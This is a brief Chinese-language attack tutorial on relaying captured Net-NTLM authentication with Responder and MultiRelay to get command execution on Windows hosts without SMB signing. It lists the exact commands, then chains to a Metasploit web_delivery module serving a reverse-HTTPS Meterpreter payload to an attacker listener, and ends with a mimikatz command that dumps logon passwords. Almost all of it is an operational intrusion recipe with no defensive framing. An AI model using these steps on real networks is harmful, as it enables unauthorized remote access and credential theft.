net-ntlm无法进行hash直接传递,通过responder等中继器拿到的net-ntlm破解也很难,所以利用responder加MultiRelay获取一直存在的shell。
注意的一点是: NTLM的hash存放在安全账户管理(SAM)数据库以及域控的NTDS.dit数据库中。
Net—NTLM的hash是用于网络认证(他们的基于用户NT的hash值通过响应的算法产生的)
漏洞利用前提:
1、目标计算机上未启用SMB签名。
2、捕获的用户的SMB Auth会话必须具有特权才能获取shell
一、配置responder
关闭smb和http监听,因为multirelay需要使用
开启responder监听
-I参数为你网卡接口
responde -I wlan0 -rv
二、获取shell
这么说不恰当,他不是一个shell,只是ntml认证让multirelay做了,但是能执行一些命令,如poweshell,所以这么说也不过分。
cd /usr/share/responder/tools python MultiRelay.py -t 172.16.20.94 -u ALL
耐心等待会得到一个shell
一些技巧
-tf targets.txt 可以指定一个文本 -c < Powershell 代码> 可以运行代码如powershell,whoami -d 只是截取net-ntlm hash
三、利用
1、配合msf
use exploit/multi/script/web_delivery set URIPATH ‘/’ set target 2 set payload windows/x64/meterpreter/reverse_https set LHOST 172.16.20.94 set LPORT 6666 run
复制powershell代码,执行获取一个meterpreter shell
2、配合cs同上powershell
略
3、自带的mimi 命令,提取命令
Mimi sekurlsa::logonpasswords